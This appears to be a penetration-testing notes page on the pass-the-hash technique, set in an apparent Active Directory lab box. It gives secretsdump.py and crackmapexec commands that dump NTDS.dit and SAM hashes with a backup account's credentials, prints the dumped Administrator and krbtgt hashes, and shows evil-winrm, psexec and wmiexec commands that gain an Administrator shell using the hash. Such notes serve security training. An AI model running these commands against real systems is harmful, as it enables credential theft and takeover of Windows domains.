Pass The Hash
Last updated
Check whether our user can retrieve secrets (reading SAM and LSA secrets from the registry, NTLM hashes, plaintext credentials, Kerberos keys and a dump of NTDS.dit):
python3 /opt/impacket/examples/secretsdump.py 'spookysec.local/backup:23894712389057@10.10.253.172' -outputfile secretsdump.dump
Or use crackmapexec:
crackmapexec smb 10.10.253.172 -u 'backup' -p '23894712389057' --ntds
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
[...]
With those hashes we can obtain a command shell using several tools (the impacket scripts take `-hashes LMHASH:NTHASH`, while evil-winrm's `-H` takes the NT hash only), for example with Administrator:
evil-winrm -i 10.10.253.172 -u Administrator -H '0e0363213e37b94221497260b0bcb4fc'
psexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
wmiexec.py Administrator@10.10.253.172 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc